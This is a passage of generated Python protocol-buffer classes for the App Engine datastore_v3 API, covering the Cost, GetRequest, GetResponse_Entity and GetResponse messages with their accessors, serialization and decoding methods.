    if self.has_id_sequence_updates_:
      self.has_id_sequence_updates_ = 0
      self.id_sequence_updates_ = 0

  def has_id_sequence_updates(self): return self.has_id_sequence_updates_


  def MergeFrom(self, x):
    """Copy every set field of x (another Cost) into self."""
    assert x is not self
    if (x.has_index_writes()): self.set_index_writes(x.index_writes())
    if (x.has_index_write_bytes()): self.set_index_write_bytes(x.index_write_bytes())
    if (x.has_entity_writes()): self.set_entity_writes(x.entity_writes())
    if (x.has_entity_write_bytes()): self.set_entity_write_bytes(x.entity_write_bytes())
    if (x.has_commitcost()): self.mutable_commitcost().MergeFrom(x.commitcost())
    if (x.has_approximate_storage_delta()): self.set_approximate_storage_delta(x.approximate_storage_delta())
    if (x.has_id_sequence_updates()): self.set_id_sequence_updates(x.id_sequence_updates())

  def Equals(self, x):
    """Field-by-field equality; presence bits must match too."""
    if x is self: return 1
    if self.has_index_writes_ != x.has_index_writes_: return 0
    if self.has_index_writes_ and self.index_writes_ != x.index_writes_: return 0
    if self.has_index_write_bytes_ != x.has_index_write_bytes_: return 0
    if self.has_index_write_bytes_ and self.index_write_bytes_ != x.index_write_bytes_: return 0
    if self.has_entity_writes_ != x.has_entity_writes_: return 0
    if self.has_entity_writes_ and self.entity_writes_ != x.entity_writes_: return 0
    if self.has_entity_write_bytes_ != x.has_entity_write_bytes_: return 0
    if self.has_entity_write_bytes_ and self.entity_write_bytes_ != x.entity_write_bytes_: return 0
    if self.has_commitcost_ != x.has_commitcost_: return 0
    if self.has_commitcost_ and self.commitcost_ != x.commitcost_: return 0
    if self.has_approximate_storage_delta_ != x.has_approximate_storage_delta_: return 0
    if self.has_approximate_storage_delta_ and self.approximate_storage_delta_ != x.approximate_storage_delta_: return 0
    if self.has_id_sequence_updates_ != x.has_id_sequence_updates_: return 0
    if self.has_id_sequence_updates_ and self.id_sequence_updates_ != x.id_sequence_updates_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff the commitcost group (when set) is initialized."""
    initialized = 1
    if (self.has_commitcost_ and not self.commitcost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    # Varint fields: 1 tag byte + varint.  commitcost is a group:
    # 2 bytes for its START/END tags plus the body.
    n = 0
    if (self.has_index_writes_): n += 1 + self.lengthVarInt64(self.index_writes_)
    if (self.has_index_write_bytes_): n += 1 + self.lengthVarInt64(self.index_write_bytes_)
    if (self.has_entity_writes_): n += 1 + self.lengthVarInt64(self.entity_writes_)
    if (self.has_entity_write_bytes_): n += 1 + self.lengthVarInt64(self.entity_write_bytes_)
    if (self.has_commitcost_): n += 2 + self.commitcost_.ByteSize()
    if (self.has_approximate_storage_delta_): n += 1 + self.lengthVarInt64(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_): n += 1 + self.lengthVarInt64(self.id_sequence_updates_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_index_writes_): n += 1 + self.lengthVarInt64(self.index_writes_)
    if (self.has_index_write_bytes_): n += 1 + self.lengthVarInt64(self.index_write_bytes_)
    if (self.has_entity_writes_): n += 1 + self.lengthVarInt64(self.entity_writes_)
    if (self.has_entity_write_bytes_): n += 1 + self.lengthVarInt64(self.entity_write_bytes_)
    if (self.has_commitcost_): n += 2 + self.commitcost_.ByteSizePartial()
    if (self.has_approximate_storage_delta_): n += 1 + self.lengthVarInt64(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_): n += 1 + self.lengthVarInt64(self.id_sequence_updates_)
    return n

  def Clear(self):
    self.clear_index_writes()
    self.clear_index_write_bytes()
    self.clear_entity_writes()
    self.clear_entity_write_bytes()
    self.clear_commitcost()
    self.clear_approximate_storage_delta()
    self.clear_id_sequence_updates()

  def OutputUnchecked(self, out):
    """Serialize to Encoder `out`; caller guarantees IsInitialized."""
    if (self.has_index_writes_):
      out.putVarInt32(8)
      out.putVarInt32(self.index_writes_)
    if (self.has_index_write_bytes_):
      out.putVarInt32(16)
      out.putVarInt32(self.index_write_bytes_)
    if (self.has_entity_writes_):
      out.putVarInt32(24)
      out.putVarInt32(self.entity_writes_)
    if (self.has_entity_write_bytes_):
      out.putVarInt32(32)
      out.putVarInt32(self.entity_write_bytes_)
    if (self.has_commitcost_):
      # CommitCost group: START_GROUP (43) ... END_GROUP (44).
      out.putVarInt32(43)
      self.commitcost_.OutputUnchecked(out)
      out.putVarInt32(44)
    if (self.has_approximate_storage_delta_):
      out.putVarInt32(64)
      out.putVarInt32(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_):
      out.putVarInt32(72)
      out.putVarInt32(self.id_sequence_updates_)

  def OutputPartial(self, out):
    """Like OutputUnchecked, but tolerates missing required sub-fields."""
    if (self.has_index_writes_):
      out.putVarInt32(8)
      out.putVarInt32(self.index_writes_)
    if (self.has_index_write_bytes_):
      out.putVarInt32(16)
      out.putVarInt32(self.index_write_bytes_)
    if (self.has_entity_writes_):
      out.putVarInt32(24)
      out.putVarInt32(self.entity_writes_)
    if (self.has_entity_write_bytes_):
      out.putVarInt32(32)
      out.putVarInt32(self.entity_write_bytes_)
    if (self.has_commitcost_):
      out.putVarInt32(43)
      self.commitcost_.OutputPartial(out)
      out.putVarInt32(44)
    if (self.has_approximate_storage_delta_):
      out.putVarInt32(64)
      out.putVarInt32(self.approximate_storage_delta_)
    if (self.has_id_sequence_updates_):
      out.putVarInt32(72)
      out.putVarInt32(self.id_sequence_updates_)

  def TryMerge(self, d):
    """Decode fields from Decoder `d` until the buffer is exhausted."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 8:
        self.set_index_writes(d.getVarInt32())
        continue
      if tt == 16:
        self.set_index_write_bytes(d.getVarInt32())
        continue
      if tt == 24:
        self.set_entity_writes(d.getVarInt32())
        continue
      if tt == 32:
        self.set_entity_write_bytes(d.getVarInt32())
        continue
      if tt == 43:
        # CommitCost group: sub-message consumes up to END_GROUP (44).
        self.mutable_commitcost().TryMerge(d)
        continue
      if tt == 64:
        self.set_approximate_storage_delta(d.getVarInt32())
        continue
      if tt == 72:
        self.set_id_sequence_updates(d.getVarInt32())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render set fields as indented debug text."""
    res=""
    if self.has_index_writes_: res+=prefix+("index_writes: %s\n" % self.DebugFormatInt32(self.index_writes_))
    if self.has_index_write_bytes_: res+=prefix+("index_write_bytes: %s\n" % self.DebugFormatInt32(self.index_write_bytes_))
    if self.has_entity_writes_: res+=prefix+("entity_writes: %s\n" % self.DebugFormatInt32(self.entity_writes_))
    if self.has_entity_write_bytes_: res+=prefix+("entity_write_bytes: %s\n" % self.DebugFormatInt32(self.entity_write_bytes_))
    if self.has_commitcost_:
      res+=prefix+"CommitCost {\n"
      res+=self.commitcost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    if self.has_approximate_storage_delta_: res+=prefix+("approximate_storage_delta: %s\n" % self.DebugFormatInt32(self.approximate_storage_delta_))
    if self.has_id_sequence_updates_: res+=prefix+("id_sequence_updates: %s\n" % self.DebugFormatInt32(self.id_sequence_updates_))
    return res


  # Invoked as a plain function during class creation; not a method.
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field-number constants; kCommitCost* belong to the nested group.
  kindex_writes = 1
  kindex_write_bytes = 2
  kentity_writes = 3
  kentity_write_bytes = 4
  kCommitCostGroup = 5
  kCommitCostrequested_entity_puts = 6
  kCommitCostrequested_entity_deletes = 7
  kapproximate_storage_delta = 8
  kid_sequence_updates = 9

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "index_writes",
    2: "index_write_bytes",
    3: "entity_writes",
    4: "entity_write_bytes",
    5: "CommitCost",
    6: "requested_entity_puts",
    7: "requested_entity_deletes",
    8: "approximate_storage_delta",
    9: "id_sequence_updates",
  }, 9)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.NUMERIC,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STARTGROUP,
    6: ProtocolBuffer.Encoder.NUMERIC,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.NUMERIC,
  }, 9, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Cost'
class GetRequest(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.GetRequest.

  Wire fields (tag numbers):
    key             (1, repeated Reference)
    transaction     (2, optional Transaction)
    failover_ms     (3, optional varint)
    strong          (4, optional bool)
    allow_deferred  (5, optional bool)
    header          (6, optional InternalHeader)

  NOTE(review): machine-generated serialization code. The literal bytes in
  OutputUnchecked/TryMerge (10, 18, 24, 32, 40, 50) encode tag<<3|wiretype
  and must not be altered by hand.
  """

  # Class-level defaults; an instance shadows these only once a field is set.
  has_header_ = 0
  header_ = None
  has_transaction_ = 0
  transaction_ = None
  has_failover_ms_ = 0
  failover_ms_ = 0
  has_strong_ = 0
  strong_ = 0
  has_allow_deferred_ = 0
  allow_deferred_ = 0

  def __init__(self, contents=None):
    # key_ is the only repeated field; lazy_init_lock_ guards lazy creation
    # of the optional submessages (header/transaction) below.
    self.key_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Lazily allocate the InternalHeader; double-checked under the lock.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    # Keeps the allocated submessage (just Clears it) rather than dropping it.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    # Appends a fresh Reference and returns it for the caller to fill in.
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def transaction(self):
    # Lazily allocate the Transaction; double-checked under the lock.
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def failover_ms(self): return self.failover_ms_

  def set_failover_ms(self, x):
    self.has_failover_ms_ = 1
    self.failover_ms_ = x

  def clear_failover_ms(self):
    if self.has_failover_ms_:
      self.has_failover_ms_ = 0
      self.failover_ms_ = 0

  def has_failover_ms(self): return self.has_failover_ms_

  def strong(self): return self.strong_

  def set_strong(self, x):
    self.has_strong_ = 1
    self.strong_ = x

  def clear_strong(self):
    if self.has_strong_:
      self.has_strong_ = 0
      self.strong_ = 0

  def has_strong(self): return self.has_strong_

  def allow_deferred(self): return self.allow_deferred_

  def set_allow_deferred(self, x):
    self.has_allow_deferred_ = 1
    self.allow_deferred_ = x

  def clear_allow_deferred(self):
    if self.has_allow_deferred_:
      self.has_allow_deferred_ = 0
      self.allow_deferred_ = 0

  def has_allow_deferred(self): return self.has_allow_deferred_


  def MergeFrom(self, x):
    # Field-by-field merge; repeated key entries are appended, not replaced.
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    if (x.has_failover_ms()): self.set_failover_ms(x.failover_ms())
    if (x.has_strong()): self.set_strong(x.strong())
    if (x.has_allow_deferred()): self.set_allow_deferred(x.allow_deferred())

  def Equals(self, x):
    # Deep value equality; returns 1/0 ints (generated code predates bool).
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if self.has_failover_ms_ != x.has_failover_ms_: return 0
    if self.has_failover_ms_ and self.failover_ms_ != x.failover_ms_: return 0
    if self.has_strong_ != x.has_strong_: return 0
    if self.has_strong_ and self.strong_ != x.strong_: return 0
    if self.has_allow_deferred_ != x.has_allow_deferred_: return 0
    if self.has_allow_deferred_ and self.allow_deferred_ != x.allow_deferred_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # Recursively validates set submessages and every repeated key element.
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    # 1 byte of tag overhead per field (all tags < 16); bools cost tag+value.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSize())
    if (self.has_failover_ms_): n += 1 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 2
    if (self.has_allow_deferred_): n += 2
    return n

  def ByteSizePartial(self):
    # Same as ByteSize but tolerates uninitialized submessages.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSizePartial())
    if (self.has_failover_ms_): n += 1 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 2
    if (self.has_allow_deferred_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_key()
    self.clear_transaction()
    self.clear_failover_ms()
    self.clear_strong()
    self.clear_allow_deferred()

  def OutputUnchecked(self, out):
    # Serialize in ascending tag order for tags 1-5; header (tag 6, byte 50)
    # is emitted last.
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    if (self.has_failover_ms_):
      out.putVarInt32(24)
      out.putVarInt64(self.failover_ms_)
    if (self.has_strong_):
      out.putVarInt32(32)
      out.putBoolean(self.strong_)
    if (self.has_allow_deferred_):
      out.putVarInt32(40)
      out.putBoolean(self.allow_deferred_)
    if (self.has_header_):
      out.putVarInt32(50)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Partial-tolerant variant of OutputUnchecked (uses ByteSizePartial).
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    if (self.has_failover_ms_):
      out.putVarInt32(24)
      out.putVarInt64(self.failover_ms_)
    if (self.has_strong_):
      out.putVarInt32(32)
      out.putBoolean(self.strong_)
    if (self.has_allow_deferred_):
      out.putVarInt32(40)
      out.putBoolean(self.allow_deferred_)
    if (self.has_header_):
      out.putVarInt32(50)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode loop: dispatch on combined tag/wiretype byte; unknown tags are
    # skipped, a zero tag means corrupt input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_failover_ms(d.getVarInt64())
        continue
      if tt == 32:
        self.set_strong(d.getBoolean())
        continue
      if tt == 40:
        self.set_allow_deferred(d.getBoolean())
        continue
      if tt == 50:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable debug dump; prefix grows for nested submessages.
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_failover_ms_: res+=prefix+("failover_ms: %s\n" % self.DebugFormatInt64(self.failover_ms_))
    if self.has_strong_: res+=prefix+("strong: %s\n" % self.DebugFormatBool(self.strong_))
    if self.has_allow_deferred_: res+=prefix+("allow_deferred: %s\n" % self.DebugFormatBool(self.allow_deferred_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Dense tag-indexed tuple; missing tags map to default.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Wire tag numbers (note header was added later and got tag 6).
  kheader = 6
  kkey = 1
  ktransaction = 2
  kfailover_ms = 3
  kstrong = 4
  kallow_deferred = 5

  # Tag -> field-name table for debug formatting; index 0 is reserved.
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "key",
    2: "transaction",
    3: "failover_ms",
    4: "strong",
    5: "allow_deferred",
    6: "header",
  }, 6)

  # Tag -> wire-type table (STRING = length-delimited submessage).
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.NUMERIC,
    6: ProtocolBuffer.Encoder.STRING,
  }, 6, ProtocolBuffer.Encoder.MAX_TYPE)


  # Generator boilerplate and fully-qualified descriptor name.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.GetRequest'
class GetResponse_Entity(ProtocolBuffer.ProtocolMessage):
  """Generated class for the `Entity` group nested in GetResponse.

  Wire fields (tag numbers within the group):
    entity  (2, optional EntityProto)
    version (3, optional varint)
    key     (4, optional Reference)

  Encoded as a protobuf *group*: TryMerge decodes until the enclosing
  ENDGROUP tag (byte 12), and this class has no _TEXT/_TYPES tables of its
  own -- those live on GetResponse.
  """

  # Class-level defaults; an instance shadows these only once a field is set.
  has_entity_ = 0
  entity_ = None
  has_key_ = 0
  key_ = None
  has_version_ = 0
  version_ = 0

  def __init__(self, contents=None):
    # lazy_init_lock_ guards lazy creation of the optional submessages.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def entity(self):
    # Lazily allocate the EntityProto; double-checked under the lock.
    if self.entity_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.entity_ is None: self.entity_ = EntityProto()
      finally:
        self.lazy_init_lock_.release()
    return self.entity_

  def mutable_entity(self): self.has_entity_ = 1; return self.entity()

  def clear_entity(self):

    # Keeps the allocated submessage (just Clears it) rather than dropping it.
    if self.has_entity_:
      self.has_entity_ = 0;
      if self.entity_ is not None: self.entity_.Clear()

  def has_entity(self): return self.has_entity_

  def key(self):
    # Lazily allocate the Reference; double-checked under the lock.
    if self.key_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.key_ is None: self.key_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.key_

  def mutable_key(self): self.has_key_ = 1; return self.key()

  def clear_key(self):

    if self.has_key_:
      self.has_key_ = 0;
      if self.key_ is not None: self.key_.Clear()

  def has_key(self): return self.has_key_

  def version(self): return self.version_

  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x

  def clear_version(self):
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = 0

  def has_version(self): return self.has_version_


  def MergeFrom(self, x):
    # Field-by-field merge of all set fields of x into self.
    assert x is not self
    if (x.has_entity()): self.mutable_entity().MergeFrom(x.entity())
    if (x.has_key()): self.mutable_key().MergeFrom(x.key())
    if (x.has_version()): self.set_version(x.version())

  def Equals(self, x):
    # Deep value equality; returns 1/0 ints.
    if x is self: return 1
    if self.has_entity_ != x.has_entity_: return 0
    if self.has_entity_ and self.entity_ != x.entity_: return 0
    if self.has_key_ != x.has_key_: return 0
    if self.has_key_ and self.key_ != x.key_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # Recursively validates the set submessages.
    initialized = 1
    if (self.has_entity_ and not self.entity_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_key_ and not self.key_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_entity_): n += 1 + self.lengthString(self.entity_.ByteSize())
    if (self.has_key_): n += 1 + self.lengthString(self.key_.ByteSize())
    if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
    return n

  def ByteSizePartial(self):
    # Same as ByteSize but tolerates uninitialized submessages.
    n = 0
    if (self.has_entity_): n += 1 + self.lengthString(self.entity_.ByteSizePartial())
    if (self.has_key_): n += 1 + self.lengthString(self.key_.ByteSizePartial())
    if (self.has_version_): n += 1 + self.lengthVarInt64(self.version_)
    return n

  def Clear(self):
    self.clear_entity()
    self.clear_key()
    self.clear_version()

  def OutputUnchecked(self, out):
    # Bytes 18/24/34 encode tags 2 (entity), 3 (version), 4 (key).
    if (self.has_entity_):
      out.putVarInt32(18)
      out.putVarInt32(self.entity_.ByteSize())
      self.entity_.OutputUnchecked(out)
    if (self.has_version_):
      out.putVarInt32(24)
      out.putVarInt64(self.version_)
    if (self.has_key_):
      out.putVarInt32(34)
      out.putVarInt32(self.key_.ByteSize())
      self.key_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Partial-tolerant variant of OutputUnchecked.
    if (self.has_entity_):
      out.putVarInt32(18)
      out.putVarInt32(self.entity_.ByteSizePartial())
      self.entity_.OutputPartial(out)
    if (self.has_version_):
      out.putVarInt32(24)
      out.putVarInt64(self.version_)
    if (self.has_key_):
      out.putVarInt32(34)
      out.putVarInt32(self.key_.ByteSizePartial())
      self.key_.OutputPartial(out)

  def TryMerge(self, d):
    # Group decoding: loop until the ENDGROUP tag (12) for this group.
    while 1:
      tt = d.getVarInt32()
      if tt == 12: break
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_entity().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_version(d.getVarInt64())
        continue
      if tt == 34:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_key().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable debug dump; prefix grows for nested submessages.
    res=""
    if self.has_entity_:
      res+=prefix+"entity <\n"
      res+=self.entity_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_key_:
      res+=prefix+"key <\n"
      res+=self.key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatInt64(self.version_))
    return res

class GetResponse(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.GetResponse.

  Wire fields (tag numbers):
    Entity   (1, repeated group GetResponse_Entity)
    deferred (5, repeated Reference)
    in_order (6, optional bool, default true)
  """

  # in_order defaults to 1 (true); clear_in_order restores that default.
  has_in_order_ = 0
  in_order_ = 1

  def __init__(self, contents=None):
    # Both fields are repeated lists; no lazy lock needed (no optional
    # submessage fields on this message).
    self.entity_ = []
    self.deferred_ = []
    if contents is not None: self.MergeFromString(contents)

  def entity_size(self): return len(self.entity_)
  def entity_list(self): return self.entity_

  def entity(self, i):
    return self.entity_[i]

  def mutable_entity(self, i):
    return self.entity_[i]

  def add_entity(self):
    # Appends a fresh group element and returns it for the caller to fill in.
    x = GetResponse_Entity()
    self.entity_.append(x)
    return x

  def clear_entity(self):
    self.entity_ = []
  def deferred_size(self): return len(self.deferred_)
  def deferred_list(self): return self.deferred_

  def deferred(self, i):
    return self.deferred_[i]

  def mutable_deferred(self, i):
    return self.deferred_[i]

  def add_deferred(self):
    x = Reference()
    self.deferred_.append(x)
    return x

  def clear_deferred(self):
    self.deferred_ = []
  def in_order(self): return self.in_order_

  def set_in_order(self, x):
    self.has_in_order_ = 1
    self.in_order_ = x

  def clear_in_order(self):
    # Resets to the proto default of 1 (true), not 0.
    if self.has_in_order_:
      self.has_in_order_ = 0
      self.in_order_ = 1

  def has_in_order(self): return self.has_in_order_


  def MergeFrom(self, x):
    # Field-by-field merge; repeated entries are appended, not replaced.
    assert x is not self
    for i in xrange(x.entity_size()): self.add_entity().CopyFrom(x.entity(i))
    for i in xrange(x.deferred_size()): self.add_deferred().CopyFrom(x.deferred(i))
    if (x.has_in_order()): self.set_in_order(x.in_order())

  def Equals(self, x):
    # Deep value equality; returns 1/0 ints.
    if x is self: return 1
    if len(self.entity_) != len(x.entity_): return 0
    for e1, e2 in zip(self.entity_, x.entity_):
      if e1 != e2: return 0
    if len(self.deferred_) != len(x.deferred_): return 0
    for e1, e2 in zip(self.deferred_, x.deferred_):
      if e1 != e2: return 0
    if self.has_in_order_ != x.has_in_order_: return 0
    if self.has_in_order_ and self.in_order_ != x.in_order_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # Recursively validates every repeated element.
    initialized = 1
    for p in self.entity_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.deferred_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    # Each Entity group costs 2 tag bytes (STARTGROUP + ENDGROUP).
    n = 0
    n += 2 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.entity_[i].ByteSize()
    n += 1 * len(self.deferred_)
    for i in xrange(len(self.deferred_)): n += self.lengthString(self.deferred_[i].ByteSize())
    if (self.has_in_order_): n += 2
    return n

  def ByteSizePartial(self):
    # Same as ByteSize but tolerates uninitialized submessages.
    n = 0
    n += 2 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.entity_[i].ByteSizePartial()
    n += 1 * len(self.deferred_)
    for i in xrange(len(self.deferred_)): n += self.lengthString(self.deferred_[i].ByteSizePartial())
    if (self.has_in_order_): n += 2
    return n

  def Clear(self):
    self.clear_entity()
    self.clear_deferred()
    self.clear_in_order()

  def OutputUnchecked(self, out):
    # Bytes 11/12 are the STARTGROUP/ENDGROUP delimiters for tag 1;
    # 42 is tag 5 (deferred), 48 is tag 6 (in_order).
    for i in xrange(len(self.entity_)):
      out.putVarInt32(11)
      self.entity_[i].OutputUnchecked(out)
      out.putVarInt32(12)
    for i in xrange(len(self.deferred_)):
      out.putVarInt32(42)
      out.putVarInt32(self.deferred_[i].ByteSize())
      self.deferred_[i].OutputUnchecked(out)
    if (self.has_in_order_):
      out.putVarInt32(48)
      out.putBoolean(self.in_order_)

  def OutputPartial(self, out):
    # Partial-tolerant variant of OutputUnchecked.
    for i in xrange(len(self.entity_)):
      out.putVarInt32(11)
      self.entity_[i].OutputPartial(out)
      out.putVarInt32(12)
    for i in xrange(len(self.deferred_)):
      out.putVarInt32(42)
      out.putVarInt32(self.deferred_[i].ByteSizePartial())
      self.deferred_[i].OutputPartial(out)
    if (self.has_in_order_):
      out.putVarInt32(48)
      out.putBoolean(self.in_order_)

  def TryMerge(self, d):
    # Decode loop; the group element consumes bytes up to its ENDGROUP tag.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 11:
        self.add_entity().TryMerge(d)
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_deferred().TryMerge(tmp)
        continue
      if tt == 48:
        self.set_in_order(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable debug dump; groups print with {} and messages with <>.
    res=""
    cnt=0
    for e in self.entity_:
      elm=""
